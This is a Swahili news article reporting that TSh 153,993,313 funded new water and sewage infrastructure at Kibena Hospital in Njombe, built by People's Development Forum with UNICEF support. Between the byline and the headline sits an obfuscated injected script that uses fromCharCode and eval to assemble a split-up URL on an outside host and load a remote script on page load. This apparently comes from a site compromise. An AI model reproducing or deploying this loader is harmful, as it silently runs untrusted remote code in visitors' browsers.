Recent Comments

WANANCHI WA NJOMBE WAFURAHIA HUDUMA

By Simamia Journal Jun 13, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

MILIONI 153,993,313 ZABORESHA AFYA ZA WANANCHI-NJOMBE

 

Na, Juventus Juvenary-Njombe

Kiasi cha Shilingi Milioni 153,993,313 zimetumika kutatua kero ya Huduma Maji safi na uchakavu wa Miundombinu ya Maji  taka ya  Hospitali  ya Kibena iliyopo kata ya Ramadhani Wilaya ya Njombe  MkoaniNjombe            .

Mradi huu ulisanifiwa na kujengwa  na Shirika lislilo la kiserikali “NGO”ya People`s Development Forum (PDF) kwa Kiswahili Jukwaa la maendeleo ya watu, ikishirikiana na Mkoa wa Njombe kwa Ufadhili wa Shirika la Umoja wa mataifa la kuhudumia watoto UNICEF ambapo Ili kupunguza gharama, PDF ilitumia wataalamu wake wandani na mafundi wa Njombe kufanyana kazi hiyo.

Akizungumza na vyombo vya habari, Mkurugenziwa PDF Bw. Ndaisaba George Ruhoro alisema kazi ya ujenzi wa mradi wa maji safi na mifumo ya maji taka katika Hospitali ya Kibena Mkoani Njombe imekamilika kwa ustadi mkubwa

Kutokana na utekelezaji wa mradi huo,Bw.Ruhoro alisema kero ya Ukosefu wa maji safi kwenye wodi za Hospitali ya Kibena itabaki kuwa historia na kwamba utoaji wa huduma za afya ya mama na mtoto umeanza kufanyika kwa muda wote bila hofu ya kukatika kwa maji

“Mradi huu umesaidia kupunguza maambukizi yamagojwa yatokanayo na uchafu au usafi duni unaotokana na kukosekana kwa maji yakutosha” alisema Bw. NDAISABA GEORGE RUHORO.

Akizungumzia mradi huo, mhaandisi aliyeusimamia  kutoka PDF Eng. Elias Erasmus Mchunguzi  alisema ni faraja kubwa kwa wananchi wa Njombe na maeneo ya jirani ambao walikuwa wakililia upatikanaji wa huduma ya maji katika Hospitali hii

Alisema wananchi walikuwa wakihitaji huduma ya maji kwaajili ya Kuoga,Kufua,kunywa na kufanyia shughuli nyingine mbalimbali wanapokuwa katika hospitali ya kibena kwaajili ya Matibabu na huduma za afya.

Hospitali hiyo iliyojengwa mwaka 1952 ilikuwa imefika mahali ambapo miundombinu ya maji safi na maji taka kushindwa kuhudumia idadi kubwa yaa wananchi wanaofika Hospitalini hapo kupokea matibabu

Alisema mradi huo pia unahusisha ujenzi wa tanki la maji lenye ujazo wa lita elfu 75, Bomba lilalosambaza maji kutoka chanzo kikuu lenye mita 364, Bomba lilalopeleka maji kwenye wodi za Hospitali lenye urefu wa mita 200 na kwamba hali hii sasa inarahisisha huduma kwa wagonjwa na wasaidizi wao

Mhandisi Mchunguzi, aliitaja miundombinu hiyo iliyojengwa na kufanyiwa ukarabati kuwa imewezesha upatikanaji wa maji katika wodi za wanaume, wananawake,watoto,wazazi,Ofisi,maabara, jingo la utawala pamoja na chumba cha miozi maarufu kama X-Ray.

Hospitali ya kibena ina uwezo wa kuhudumia wagonjwa 160 wanaolazwa, wagonjwa wa nje 330,wahudumu 287, na wanafunzi 100 wanaofanya mafunzo kwa vitendo kutoka vyuo malimbali

Nao baadhi ya wananchi wanchi waliozungumzia mradi huo walieleza kufarijika kwa kiasi kikubwa huku wakipongeza jitihada zilizofanywa kuiboresha Hospitali ya Kibena inayopokea na kuhudumia wananchi wanaotoka maeneo mbali mbali kama vile hamashauri ya Mji wa Njombe, Halmashauri ya Makambako, Njombe Vijijini na Wanging’ombe

Hata hivyo, inaelezwa kuwa Hospitali ya Kibena inawahudumia pia wananchi kutoka wilaya za mikoa jirani ya Ruvuma,Morogoro na Iringa.      Mwisho

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv